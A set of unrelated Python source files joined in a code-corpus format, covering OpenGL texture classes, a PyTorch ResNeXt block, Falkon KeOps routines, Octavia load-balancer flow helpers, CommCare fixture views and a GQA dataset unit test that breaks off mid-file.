self.attribute.set_attribute("min_filter", self.min_filter)
self.attribute.set_attribute("mag_filter", self.mag_filter)
self.attribute.set_attribute("multisample_count", self.multisample_count)
self.attribute.set_attribute("wrap", self.wrap)
self.attribute.set_attribute("wrap_s", self.wrap_s)
self.attribute.set_attribute("wrap_t", self.wrap_t)
self.attribute.set_attribute("wrap_r", self.wrap_r)
return self.attribute
def set_attribute(self, attribute_name, attribute_value, item_info_history, attribute_index):
if hasattr(self, attribute_name) and "" != attribute_value:
setattr(self, attribute_name, eval(attribute_value))
if 'wrap' in attribute_name:
glBindTexture(self.target, self.buffer)
glTexParameteri(self.target, GL_TEXTURE_WRAP_S, self.wrap_s or self.wrap)
glTexParameteri(self.target, GL_TEXTURE_WRAP_T, self.wrap_t or self.wrap)
glTexParameteri(self.target, GL_TEXTURE_WRAP_R, self.wrap_r or self.wrap)
glBindTexture(self.target, 0)
return self.attribute
class Texture2D(Texture):
target = GL_TEXTURE_2D
def create_texture(self, **texture_data):
Texture.create_texture(self, **texture_data)
data = texture_data.get('data')
self.buffer = glGenTextures(1)
glBindTexture(GL_TEXTURE_2D, self.buffer)
if self.use_glTexStorage:
glTexStorage2D(GL_TEXTURE_2D,
self.get_mipmap_count(),
self.internal_format,
self.width, self.height)
if data is not None:
glTexSubImage2D(GL_TEXTURE_2D,
0,
0, 0,
self.width, self.height,
self.texture_format,
self.data_type,
data)
else:
glTexImage2D(GL_TEXTURE_2D,
0,
self.internal_format,
self.width,
self.height,
0,
self.texture_format,
self.data_type,
data)
if self.enable_mipmap:
glGenerateMipmap(GL_TEXTURE_2D)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, self.wrap_s or self.wrap)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, self.wrap_t or self.wrap)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, self.min_filter)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, self.mag_filter)
if self.clear_color is not None:
glClearTexImage(self.buffer, 0, self.texture_format, self.data_type, self.clear_color)
glBindTexture(GL_TEXTURE_2D, 0)
class Texture2DArray(Texture):
target = GL_TEXTURE_2D_ARRAY
def create_texture(self, **texture_data):
Texture.create_texture(self, **texture_data)
data = texture_data.get('data')
self.buffer = glGenTextures(1)
glBindTexture(GL_TEXTURE_2D_ARRAY, self.buffer)
if self.use_glTexStorage:
glTexStorage3D(GL_TEXTURE_2D_ARRAY,
self.get_mipmap_count(),
self.internal_format,
self.width, self.height, self.depth)
if data is not None:
glTexSubImage3D(GL_TEXTURE_2D_ARRAY,
0,
0, 0, 0,
self.width, self.height, self.depth,
self.texture_format,
self.data_type,
data)
else:
glTexImage3D(GL_TEXTURE_2D_ARRAY,
0,
self.internal_format,
self.width,
self.height,
self.depth,
0,
self.texture_format,
self.data_type,
data)
if self.enable_mipmap:
glGenerateMipmap(GL_TEXTURE_2D_ARRAY)
glTexParameteri(GL_TEXTURE_2D_ARRAY, GL_TEXTURE_WRAP_S, self.wrap_s or self.wrap)
glTexParameteri(GL_TEXTURE_2D_ARRAY, GL_TEXTURE_WRAP_T, self.wrap_t or self.wrap)
glTexParameteri(GL_TEXTURE_2D_ARRAY, GL_TEXTURE_MIN_FILTER, self.min_filter)
glTexParameteri(GL_TEXTURE_2D_ARRAY, GL_TEXTURE_MAG_FILTER, self.mag_filter)
glBindTexture(GL_TEXTURE_2D_ARRAY, 0)
class Texture3D(Texture):
target = GL_TEXTURE_3D
def create_texture(self, **texture_data):
Texture.create_texture(self, **texture_data)
data = texture_data.get('data')
self.buffer = glGenTextures(1)
glBindTexture(GL_TEXTURE_3D, self.buffer)
if self.use_glTexStorage:
glTexStorage3D(GL_TEXTURE_3D,
self.get_mipmap_count(),
self.internal_format,
self.width, self.height, self.depth)
if data is not None:
glTexSubImage3D(GL_TEXTURE_3D,
0,
0, 0, 0,
self.width, self.height, self.depth,
self.texture_format,
self.data_type,
data)
else:
glTexImage3D(GL_TEXTURE_3D,
0,
self.internal_format,
self.width,
self.height,
self.depth,
0,
self.texture_format,
self.data_type,
data)
if self.enable_mipmap:
glGenerateMipmap(GL_TEXTURE_3D)
glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_WRAP_S, self.wrap_s or self.wrap)
glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_WRAP_T, self.wrap_t or self.wrap)
glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_WRAP_R, self.wrap_r or self.wrap)
glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_MIN_FILTER, self.min_filter)
glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_MAG_FILTER, self.mag_filter)
glBindTexture(GL_TEXTURE_3D, 0)
class Texture2DMultiSample(Texture):
target = GL_TEXTURE_2D_MULTISAMPLE
def create_texture(self, **texture_data):
Texture.create_texture(self, **texture_data)
multisample_count = texture_data.get('multisample_count', 4)
self.multisample_count = multisample_count - (multisample_count % 4)
self.buffer = glGenTextures(1)
glBindTexture(GL_TEXTURE_2D_MULTISAMPLE, self.buffer)
if self.use_glTexStorage:
glTexStorage2DMultisample(GL_TEXTURE_2D_MULTISAMPLE,
self.multisample_count,
self.internal_format,
self.width,
self.height,
GL_TRUE)
else:
glTexImage2DMultisample(GL_TEXTURE_2D_MULTISAMPLE,
self.multisample_count,
self.internal_format,
self.width,
self.height,
GL_TRUE)
glBindTexture(GL_TEXTURE_2D_MULTISAMPLE, 0)
class TextureCube(Texture):
target = GL_TEXTURE_CUBE_MAP
default_wrap = GL_REPEAT
def __init__(self, **texture_data):
self.texture_positive_x = None
self.texture_negative_x = None
self.texture_positive_y = None
self.texture_negative_y = None
self.texture_positive_z = None
self.texture_negative_z = None
Texture.__init__(self, **texture_data)
def create_texture(self, **texture_data):
Texture.create_texture(self, **texture_data)
# If texture2d is None then create render target.
face_texture_datas = copy.copy(texture_data)
face_texture_datas.pop('name')
face_texture_datas['texture_type'] = Texture2D
self.texture_positive_x = texture_data.get('texture_positive_x', CreateTexture(name=self.name + "_right", **face_texture_datas))
self.texture_negative_x = texture_data.get('texture_negative_x', CreateTexture(name=self.name + "_left", **face_texture_datas))
self.texture_positive_y = texture_data.get('texture_positive_y', CreateTexture(name=self.name + "_top", **face_texture_datas))
self.texture_negative_y = texture_data.get('texture_negative_y', CreateTexture(name=self.name + "_bottom", **face_texture_datas))
self.texture_positive_z = texture_data.get('texture_positive_z', CreateTexture(name=self.name + "_front", **face_texture_datas))
self.texture_negative_z = texture_data.get('texture_negative_z', CreateTexture(name=self.name + "_back", **face_texture_datas))
self.buffer = glGenTextures(1)
glBindTexture(GL_TEXTURE_CUBE_MAP, self.buffer)
if self.use_glTexStorage:
glTexStorage2D(GL_TEXTURE_CUBE_MAP, self.get_mipmap_count(), self.internal_format, self.width, self.height)
self.createTexSubImage2D(GL_TEXTURE_CUBE_MAP_POSITIVE_X, self.texture_positive_x) # Right
self.createTexSubImage2D(GL_TEXTURE_CUBE_MAP_NEGATIVE_X, self.texture_negative_x) # Left
self.createTexSubImage2D(GL_TEXTURE_CUBE_MAP_POSITIVE_Y, self.texture_positive_y) # Top
self.createTexSubImage2D(GL_TEXTURE_CUBE_MAP_NEGATIVE_Y, self.texture_negative_y) # Bottom
self.createTexSubImage2D(GL_TEXTURE_CUBE_MAP_POSITIVE_Z, self.texture_positive_z) # Front
self.createTexSubImage2D(GL_TEXTURE_CUBE_MAP_NEGATIVE_Z, self.texture_negative_z) # Back
else:
self.createTexImage2D(GL_TEXTURE_CUBE_MAP_POSITIVE_X, self.texture_positive_x) # Right
self.createTexImage2D(GL_TEXTURE_CUBE_MAP_NEGATIVE_X, self.texture_negative_x) # Left
self.createTexImage2D(GL_TEXTURE_CUBE_MAP_POSITIVE_Y, self.texture_positive_y) # Top
self.createTexImage2D(GL_TEXTURE_CUBE_MAP_NEGATIVE_Y, self.texture_negative_y) # Bottom
self.createTexImage2D(GL_TEXTURE_CUBE_MAP_POSITIVE_Z, self.texture_positive_z) # Front
self.createTexImage2D(GL_TEXTURE_CUBE_MAP_NEGATIVE_Z, self.texture_negative_z) # Back
if self.enable_mipmap:
glGenerateMipmap(GL_TEXTURE_CUBE_MAP)
glTexParameteri(GL_TEXTURE_CUBE_MAP, GL_TEXTURE_WRAP_S, self.wrap_s or self.wrap)
glTexParameteri(GL_TEXTURE_CUBE_MAP, GL_TEXTURE_WRAP_T, self.wrap_t or self.wrap)
glTexParameteri(GL_TEXTURE_CUBE_MAP, GL_TEXTURE_WRAP_R, self.wrap_r or self.wrap)
glTexParameteri(GL_TEXTURE_CUBE_MAP, GL_TEXTURE_MIN_FILTER, self.min_filter)
glTexParameteri(GL_TEXTURE_CUBE_MAP, GL_TEXTURE_MAG_FILTER, self.mag_filter)
glBindTexture(GL_TEXTURE_CUBE_MAP, 0)
@staticmethod
def createTexImage2D(target_face, texture):
glTexImage2D(target_face,
0,
texture.internal_format,
texture.width,
texture.height,
0,
texture.texture_format,
texture.data_type,
texture.get_image_data())
@staticmethod
def createTexSubImage2D(target_face, texture):
glTexSubImage2D(target_face,
0,
0, 0,
texture.width, texture.height,
texture.texture_format,
texture.data_type,
texture.get_image_data())
def delete(self):
super(TextureCube, self).delete()
self.texture_positive_x.delete()
self.texture_negative_x.delete()
self.texture_positive_y.delete()
self.texture_negative_y.delete()
self.texture_positive_z.delete()
self.texture_negative_z.delete()
def get_save_data(self, get_image_data=True):
save_data = Texture.get_save_data(self)
save_data['texture_positive_x'] = self.texture_positive_x.name
save_data['texture_negative_x'] = self.texture_negative_x.name
save_data['texture_positive_y'] = self.texture_positive_y.name
save_data['texture_negative_y'] = self.texture_negative_y.name
save_data['texture_positive_z'] = self.texture_positive_z.name
save_data['texture_negative_z'] = self.texture_negative_z.name
return save_data
def get_attribute(self):
Texture.get_attribute(self)
self.attribute.set_attribute("texture_positive_x", self.texture_positive_x.name)
self.attribute.set_attribute("texture_negative_x", self.texture_negative_x.name)
self.attribute.set_attribute("texture_positive_y", self.texture_positive_y.name)
self.attribute.set_attribute("texture_negative_y", self.texture_negative_y.name)
self.attribute.set_attribute("texture_positive_z", self.texture_positive_z.name)
self.attribute.set_attribute("texture_negative_z", self.texture_negative_z.name)
return self.attribute
|
models/ClassicNetwork/blocks/resnext_block.py | Dou-Yu-xuan/deep-learning-visal | 150 | 31180 | <filename>models/ClassicNetwork/blocks/resnext_block.py<gh_stars>100-1000
# -*- coding: UTF-8 -*-
"""
@<NAME> 2020_09_08
"""
import torch.nn as nn
import torch.nn.functional as F
from models.blocks.SE_block import SE
from models.blocks.conv_bn import BN_Conv2d
class ResNeXt_Block(nn.Module):
"""
ResNeXt block with group convolutions
"""
def __init__(self, in_chnls, cardinality, group_depth, stride, is_se=False):
super(ResNeXt_Block, self).__init__()
self.is_se = is_se
self.group_chnls = cardinality * group_depth
self.conv1 = BN_Conv2d(in_chnls, self.group_chnls, 1, stride=1, padding=0)
self.conv2 = BN_Conv2d(self.group_chnls, self.group_chnls, 3, stride=stride, padding=1, groups=cardinality)
self.conv3 = nn.Conv2d(self.group_chnls, self.group_chnls * 2, 1, stride=1, padding=0)
self.bn = nn.BatchNorm2d(self.group_chnls * 2)
if self.is_se:
self.se = SE(self.group_chnls * 2, 16)
self.short_cut = nn.Sequential(
nn.Conv2d(in_chnls, self.group_chnls * 2, 1, stride, 0, bias=False),
nn.BatchNorm2d(self.group_chnls * 2)
)
def forward(self, x):
out = self.conv1(x)
out = self.conv2(out)
out = self.bn(self.conv3(out))
if self.is_se:
coefficient = self.se(out)
out *= coefficient
out += self.short_cut(x)
return F.relu(out)
|
unittest/scripts/py_dev_api_examples/working_with_collections/Working_with_Existing_Collections.py | mueller/mysql-shell | 119 | 31269 | # Get a collection object for 'my_collection'
myColl = db.get_collection('my_collection')
|
falkon/mmv_ops/keops.py | mohamad-amin/falkon | 130 | 31271 | import warnings
from dataclasses import dataclass
from typing import List, Optional
import torch
from falkon.utils.stream_utils import sync_current_stream
from falkon.mmv_ops.utils import _get_gpu_info, create_output_mat, _start_wait_processes
from falkon.options import FalkonOptions, BaseOptions
from falkon.utils import decide_cuda
from falkon.utils.helpers import sizeof_dtype, calc_gpu_block_sizes
from pykeops.torch import Genred
@dataclass(frozen=True)
class ArgsFmmv:
X1: torch.Tensor
X2: torch.Tensor
v: torch.Tensor
other_vars: List[torch.Tensor]
out: torch.Tensor
gpu_ram: float
backend: str
function: callable
def _keops_dtype(dtype: torch.dtype) -> str:
"""Returns a string which represents the given data type.
The string representation is necessary for KeOps which doesn't
like type objects.
"""
if dtype == torch.float64:
return 'float64'
elif dtype == torch.float32:
return 'float32'
else:
raise NotImplementedError("Data type %s not recognized." % (dtype))
def _decide_backend(opt: BaseOptions, num_dim: int) -> str:
"""Switch between CPU and GPU backend for KeOps
"""
if not decide_cuda(opt):
return 'CPU'
else:
return 'GPU_1D'
def _estimate_split(N, M, D, T, R, ds):
"""Estimate the splits along dimensions N and M for a MVM to fit in memory
The operations consist of computing the product between a kernel
matrix (from a N*D and a M*D matrix) and a 'vector' of shape M*T
This typically requires storage of the input and output matrices,
which occupies (M + N)*(D + T) memory locations plus some intermediate
buffers to perform computations.
TODO: It is not clear how much intermediate memory KeOps requires;
the only thing that is certain is that it is quadratic in D.
For now we sidestep this issue by using a smaller R than what is
actually available in GPU memory.
This function calculates the split along N and M into blocks of size n*m
so that we can compute the kernel-vector product between such blocks
and still fit in GPU memory.
Parameters
-----------
- N : int
The first dimension of the kernel matrix
- M : int
The second dimension of the kernel matrix
- D : int
The data dimensionality
- T : int
The number of output columns
- R : float
The amount of memory available (in bytes)
- ds : int
The size in bytes of each element in the data matrices
(e.g. 4 if the data is in single precision).
Returns
--------
- n : int
The block size to be used along the first dimension
- m : int
The block size along the second dimension of the kernel
matrix
Raises
-------
RuntimeError
If the available memory `R` is insufficient to store even the smallest
possible input matrices. This may happen if `D` is very large since we
do not perform any splitting along `D`.
Notes
------
We find 'good' values of M, N such that
N*(D+T) + M*(D+T) <= R/ds
"""
R = R / ds
# We have a linear equation in two variables (N, M)
slope = -1
intercept = R / (D + T)
slack_points = 10
# We try to pick a point at the edges such that only one kind of split
# is necessary
if N < intercept - 1:
M = min(M, intercept + slope * N)
elif M < intercept - 1:
N = min(N, intercept + slope * M)
else:
# All points on the slope such that N, M > 0 are possible
N = intercept - slack_points - 1
M = intercept + slope * N
if N <= 0 or M <= 0:
raise RuntimeError(
"Insufficient available GPU "
"memory (available %.2fGB)" % (R * ds / 2 ** 30))
return int(N), int(M)
def _single_gpu_method(proc_idx, queue, device_id):
a: ArgsFmmv = queue.get()
backend = a.backend
X1 = a.X1
X2 = a.X2
v = a.v
oout = a.out
other_vars = a.other_vars
fn = a.function
R = a.gpu_ram
N, D = X1.shape
M = X2.shape[0]
T = v.shape[1]
device = torch.device(f"cuda:{device_id}")
# Second round of subdivision (only if necessary due to RAM constraints)
n, m = _estimate_split(N, M, D, T, R, sizeof_dtype(X1.dtype))
other_vars_dev = [ov.to(device, copy=False) for ov in other_vars]
out_ic = oout.device.index == device_id
# Process the two rounds of splitting with a nested loop.
with torch.cuda.device(device_id):
for mi in range(0, M, m):
ml = min(m, M - mi)
if ml != M and mi > 0: # Then we must create a temporary output array
out = torch.empty_like(oout)
else:
out = oout
cX2 = X2[mi:mi + ml, :].to(device, copy=False)
cv = v[mi:mi + ml, :].to(device, copy=False)
for ni in range(0, N, n):
nl = min(n, N - ni)
cX1 = X1[ni:ni + nl, :].to(device, copy=False)
cout = out[ni: ni + nl, :].to(device, copy=False)
variables = [cX1, cX2, cv] + other_vars_dev
fn(*variables, out=cout, device_id=device_id, backend=backend)
if not out_ic:
out[ni: ni + nl, :].copy_(cout)
if ml != M and mi > 0:
oout.add_(out)
return oout
def run_keops_mmv(X1: torch.Tensor,
X2: torch.Tensor,
v: torch.Tensor,
other_vars: List[torch.Tensor],
out: Optional[torch.Tensor],
formula: str,
aliases: List[str],
axis: int,
reduction: str = 'Sum',
opt: Optional[FalkonOptions] = None) -> torch.Tensor:
if opt is None:
opt = FalkonOptions()
# Choose backend
N, D = X1.shape
T = v.shape[1]
backend = _decide_backend(opt, D)
dtype = _keops_dtype(X1.dtype)
data_devs = [X1.device, X2.device, v.device]
if any([ddev.type == 'cuda' for ddev in data_devs]) and (not backend.startswith("GPU")):
warnings.warn("KeOps backend was chosen to be CPU, but GPU input tensors found. "
"Defaulting to 'GPU_1D' backend. To force usage of the CPU backend, "
"please pass CPU tensors; to avoid this warning if the GPU backend is "
"desired, check your options (i.e. set 'use_cpu=False').")
backend = "GPU_1D"
differentiable = any(
[X1.requires_grad, X2.requires_grad, v.requires_grad] +
[o.requires_grad for o in other_vars]
)
if differentiable:
from falkon.kernels.tiling_red import TilingGenred
fn = TilingGenred(formula, aliases, reduction_op='Sum', axis=1, dtype=dtype,
dtype_acc="auto", sum_scheme="auto", opt=opt)
return fn(X1, X2, v, *other_vars, out=out, backend=backend)
# Define formula wrapper
fn = Genred(formula, aliases,
reduction_op=reduction, axis=axis,
dtype=dtype, dtype_acc=opt.keops_acc_dtype,
sum_scheme=opt.keops_sum_scheme)
comp_dev_type = backend[:3].lower().replace('gpu', 'cuda') # 'cpu' or 'cuda'
out = create_output_mat(out, data_devs, is_sparse=False, shape=(N, T), dtype=X1.dtype,
comp_dev_type=comp_dev_type, other_mat=X1, output_stride="C")
if comp_dev_type == 'cpu' and all([ddev.type == 'cpu' for ddev in data_devs]): # incore CPU
variables = [X1, X2, v] + other_vars
out = fn(*variables, out=out, backend=backend)
elif comp_dev_type == 'cuda' and all([ddev.type == 'cuda' for ddev in data_devs]): # incore CUDA
variables = [X1, X2, v] + other_vars
device = data_devs[0]
with torch.cuda.device(device):
sync_current_stream(device)
out = fn(*variables, out=out, backend=backend)
else: # Out of core
# slack is high due to imprecise memory usage estimates for keops
gpu_info = _get_gpu_info(opt, slack=opt.keops_memory_slack)
block_sizes = calc_gpu_block_sizes(gpu_info, N)
# Create queues
args = [] # Arguments passed to each subprocess
for i, g in enumerate(gpu_info):
# First round of subdivision
bwidth = block_sizes[i + 1] - block_sizes[i]
if bwidth <= 0:
continue
args.append((ArgsFmmv(
X1=X1.narrow(0, block_sizes[i], bwidth),
X2=X2,
v=v,
out=out.narrow(0, block_sizes[i], bwidth),
other_vars=other_vars,
function=fn,
backend=backend,
gpu_ram=g.usable_memory
), g.Id))
_start_wait_processes(_single_gpu_method, args)
return out
|
octavia/controller/worker/v2/flows/flow_utils.py | zhangi/octavia | 129 | 31336 | <reponame>zhangi/octavia
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from octavia.api.drivers import utils as provider_utils
from octavia.controller.worker.v2.flows import amphora_flows
from octavia.controller.worker.v2.flows import health_monitor_flows
from octavia.controller.worker.v2.flows import l7policy_flows
from octavia.controller.worker.v2.flows import l7rule_flows
from octavia.controller.worker.v2.flows import listener_flows
from octavia.controller.worker.v2.flows import load_balancer_flows
from octavia.controller.worker.v2.flows import member_flows
from octavia.controller.worker.v2.flows import pool_flows
LB_FLOWS = load_balancer_flows.LoadBalancerFlows()
AMP_FLOWS = amphora_flows.AmphoraFlows()
HM_FLOWS = health_monitor_flows.HealthMonitorFlows()
L7_POLICY_FLOWS = l7policy_flows.L7PolicyFlows()
L7_RULES_FLOWS = l7rule_flows.L7RuleFlows()
LISTENER_FLOWS = listener_flows.ListenerFlows()
M_FLOWS = member_flows.MemberFlows()
P_FLOWS = pool_flows.PoolFlows()
def get_create_load_balancer_flow(topology, listeners=None):
return LB_FLOWS.get_create_load_balancer_flow(topology,
listeners=listeners)
def get_delete_load_balancer_flow(lb):
return LB_FLOWS.get_delete_load_balancer_flow(lb)
def get_listeners_on_lb(db_lb):
"""Get a list of the listeners on a load balancer.
:param db_lb: A load balancer database model object.
:returns: A list of provider dict format listeners.
"""
listener_dicts = []
for listener in db_lb.listeners:
prov_listener = provider_utils.db_listener_to_provider_listener(
listener)
listener_dicts.append(prov_listener.to_dict())
return listener_dicts
def get_pools_on_lb(db_lb):
"""Get a list of the pools on a load balancer.
:param db_lb: A load balancer database model object.
:returns: A list of provider dict format pools.
"""
pool_dicts = []
for pool in db_lb.pools:
prov_pool = provider_utils.db_pool_to_provider_pool(pool)
pool_dicts.append(prov_pool.to_dict())
return pool_dicts
def get_cascade_delete_load_balancer_flow(lb, listeners=(), pools=()):
return LB_FLOWS.get_cascade_delete_load_balancer_flow(lb, listeners,
pools)
def get_update_load_balancer_flow():
return LB_FLOWS.get_update_load_balancer_flow()
def get_create_amphora_flow():
return AMP_FLOWS.get_create_amphora_flow()
def get_delete_amphora_flow(amphora, retry_attempts=None, retry_interval=None):
return AMP_FLOWS.get_delete_amphora_flow(amphora, retry_attempts,
retry_interval)
def get_failover_LB_flow(amps, lb):
return LB_FLOWS.get_failover_LB_flow(amps, lb)
def get_failover_amphora_flow(amphora_dict, lb_amp_count):
return AMP_FLOWS.get_failover_amphora_flow(amphora_dict, lb_amp_count)
def cert_rotate_amphora_flow():
return AMP_FLOWS.cert_rotate_amphora_flow()
def update_amphora_config_flow():
return AMP_FLOWS.update_amphora_config_flow()
def get_create_health_monitor_flow():
return HM_FLOWS.get_create_health_monitor_flow()
def get_delete_health_monitor_flow():
return HM_FLOWS.get_delete_health_monitor_flow()
def get_update_health_monitor_flow():
return HM_FLOWS.get_update_health_monitor_flow()
def get_create_l7policy_flow():
return L7_POLICY_FLOWS.get_create_l7policy_flow()
def get_delete_l7policy_flow():
return L7_POLICY_FLOWS.get_delete_l7policy_flow()
def get_update_l7policy_flow():
return L7_POLICY_FLOWS.get_update_l7policy_flow()
def get_create_l7rule_flow():
return L7_RULES_FLOWS.get_create_l7rule_flow()
def get_delete_l7rule_flow():
return L7_RULES_FLOWS.get_delete_l7rule_flow()
def get_update_l7rule_flow():
return L7_RULES_FLOWS.get_update_l7rule_flow()
def get_create_listener_flow():
return LISTENER_FLOWS.get_create_listener_flow()
def get_create_all_listeners_flow():
return LISTENER_FLOWS.get_create_all_listeners_flow()
def get_delete_listener_flow():
return LISTENER_FLOWS.get_delete_listener_flow()
def get_update_listener_flow():
return LISTENER_FLOWS.get_update_listener_flow()
def get_create_member_flow():
return M_FLOWS.get_create_member_flow()
def get_delete_member_flow():
return M_FLOWS.get_delete_member_flow()
def get_update_member_flow():
return M_FLOWS.get_update_member_flow()
def get_batch_update_members_flow(old_members, new_members, updated_members):
return M_FLOWS.get_batch_update_members_flow(old_members, new_members,
updated_members)
def get_create_pool_flow():
return P_FLOWS.get_create_pool_flow()
def get_delete_pool_flow():
return P_FLOWS.get_delete_pool_flow()
def get_update_pool_flow():
return P_FLOWS.get_update_pool_flow()
|
corehq/apps/fixtures/interface.py | omari-funzone/commcare-hq | 471 | 31356 | from django.contrib import messages
from django.http import HttpResponseRedirect
from django.utils.functional import cached_property
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_noop, ugettext_lazy
from couchdbkit import ResourceNotFound
from memoized import memoized
from corehq.apps.fixtures.dispatcher import FixtureInterfaceDispatcher
from corehq.apps.fixtures.models import FixtureDataType, _id_from_doc
from corehq.apps.fixtures.views import FixtureViewMixIn, fixtures_home
from corehq.apps.reports.filters.base import BaseSingleOptionFilter
from corehq.apps.reports.generic import GenericReportView, GenericTabularReport
class FixtureInterface(FixtureViewMixIn, GenericReportView):
base_template = 'fixtures/fixtures_base.html'
asynchronous = False
dispatcher = FixtureInterfaceDispatcher
exportable = False
needs_filters = False
class FixtureSelectFilter(BaseSingleOptionFilter):
slug = "table_id"
label = ""
placeholder = "place"
default_text = ugettext_lazy("Select a Table")
@property
def selected(self):
# ko won't display default selected-value as it should, display default_text instead
return ""
@property
@memoized
def fixtures(self):
return sorted(FixtureDataType.by_domain(self.domain), key=lambda t: t.tag.lower())
@property
@memoized
def options(self):
return [(_id_from_doc(f), f.tag) for f in self.fixtures]
class FixtureViewInterface(GenericTabularReport, FixtureInterface):
name = ugettext_noop("View Tables")
slug = "view_lookup_tables"
report_template_path = 'fixtures/view_table.html'
fields = ['corehq.apps.fixtures.interface.FixtureSelectFilter']
@property
def view_response(self):
if not self.has_tables():
messages.info(self.request, _("You don't have any tables defined yet - create tables to view them."))
return HttpResponseRedirect(fixtures_home(self.domain))
else:
return super(FixtureViewInterface, self).view_response
@property
def report_context(self):
assert self.has_tables()
if not self.request.GET.get("table_id", None):
return {"table_not_selected": True}
try:
context = super(FixtureViewInterface, self).report_context
except ResourceNotFound:
return {"table_not_selected": True}
# Build javascript options for DataTables
report_table = context['report_table']
headers = report_table.get('headers')
data_tables_options = {
'slug': self.context['report']['slug'],
'defaultRows': report_table.get('default_rows', 10),
'startAtRowNum': report_table.get('start_at_row', 0),
'showAllRowsOption': report_table.get('show_all_rows'),
'autoWidth': headers.auto_width,
}
if headers.render_aoColumns:
data_tables_options.update({
'aoColumns': headers.render_aoColumns,
})
if headers.custom_sort:
data_tables_options.update({
'customSort': headers.custom_sort,
})
pagination = context['report_table'].get('pagination', {})
if pagination.get('is_on'):
data_tables_options.update({
'ajaxSource': pagination.get('source'),
'ajaxParams': pagination.get('params'),
})
left_col = context['report_table'].get('left_col', {})
if left_col.get('is_fixed'):
data_tables_options.update({
'fixColumns': True,
'fixColsNumLeft': left_col['fixed'].get('num'),
'fixColsWidth': left_col['fixed'].get('width'),
})
context.update({
"selected_table": self.table.get("table_id", ""),
'data_tables_options': data_tables_options,
})
if self.lookup_table:
context.update({
"table_description": self.lookup_table.description,
})
return context
@memoized
def has_tables(self):
return True if list(FixtureDataType.by_domain(self.domain)) else False
@property
@memoized
def table(self):
from corehq.apps.fixtures.views import data_table
if self.has_tables() and self.request.GET.get("table_id", None):
return data_table(self.request, self.domain)
else:
return {"headers": None, "rows": None}
@cached_property
def lookup_table(self):
if self.has_tables() and self.request.GET.get("table_id", None):
return FixtureDataType.get(self.request.GET['table_id'])
return None
@property
def headers(self):
return self.table["headers"]
@property
def rows(self):
return self.table["rows"]
class FixtureEditInterface(FixtureInterface):
name = ugettext_noop("Manage Tables")
slug = "edit_lookup_tables"
report_template_path = 'fixtures/manage_tables.html'
@property
def report_context(self):
context = super(FixtureEditInterface, self).report_context
context.update(types=self.data_types)
return context
@property
@memoized
def data_types(self):
return list(FixtureDataType.by_domain(self.domain))
|
tests/components/tasks/gqa_tests.py | aasseman/pytorchpipe | 232 | 31387 | <filename>tests/components/tasks/gqa_tests.py
# -*- coding: utf-8 -*-
#
# Copyright (C) tkornuta, IBM Corporation 2019
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = "<NAME>"
import unittest
from unittest.mock import MagicMock, patch
from os import path
from ptp.components.mixins.io import check_file_existence
from ptp.components.tasks.image_text_to_class.gqa import GQA
from ptp.configuration.config_interface import ConfigInterface
class TestGQA(unittest.TestCase):
def test_training_0_split(self):
"""
Tests the training_0 split.
..note:
Test on real data is performed only if adequate json source file is found.
"""
# Empty config.
config = ConfigInterface()
config.add_config_params({"gqa_training_0": {"split": "training_0", "globals": {"image_height": "gqa_image_height", "image_width": "gqa_image_width"}}})
# Check the existence of test set.
if False: #check_file_existence(path.expanduser('~/data/gqa/questions1.2/train_all_questions'),'train_all_questions_0.json'):
# Create object.
task = GQA("gqa_training_0", config["gqa_training_0"])
# Check dataset size.
self.assertEqual(len(task), 1430536)
# Get sample.
sample = task[0]
else:
processed_dataset_content = [ {'sample_ids': '07333408', 'image_ids': '2375429', 'questions': 'What is on the white wall?', 'answers': 'pipe', 'full_answers': 'The pipe is on the wall.'} ]
# Mock up the load_dataset method.
with patch( "ptp.components.tasks.image_text_to_class.gqa.GQA.load_dataset", MagicMock( side_effect = [ processed_dataset_content ] )):
task = GQA("gqa_training_0", config["gqa_training_0"])
# Mock up the get_image method.
with patch( "ptp.components.tasks.image_text_to_class.gqa.GQA.get_image", MagicMock( side_effect = [ "0" ] )):
sample = task[0]
# Check sample.
self.assertEqual(sample['indices'], 0)
self.assertEqual(sample['sample_ids'], '07333408')
self.assertEqual(sample['image_ids'], '2375429')
self.assertEqual(sample['questions'], 'What is on the white wall?')
self.assertEqual(sample['answers'], 'pipe')
self.assertEqual(sample['full_answers'], 'The pipe is on the wall.')
def test_validation_split(self):
"""
Tests the validation split.
..note:
Test on real data is performed only if adequate json source file is found.
"""
# Empty config.
config = ConfigInterface()
config.add_config_params({"gqa_validation": {"split": "validation", "globals": {"image_height": "gqa_image_height", "image_width": "gqa_image_width"}}})
# Check the existence of test set.
if False: #check_file_existence(path.expanduser('~/data/gqa/questions1.2'),'val_all_questions.json'):
# Create object.
task = GQA("gqa_validation", config["gqa_validation"])
# Check dataset size.
self.assertEqual(len(task), 2011853)
# Get sample.
sample = task[0]
else:
processed_dataset_content = [ {'sample_ids': '05451384', 'image_ids': '2382986', 'questions': 'Are there blankets under the brown cat?', 'answers': 'no', 'full_answers': 'No, there is a towel under the cat.'} ]
# Mock up the load_dataset method.
with patch( "ptp.components.tasks.image_text_to_class.gqa.GQA.load_dataset", MagicMock( side_effect = [ processed_dataset_content ] )):
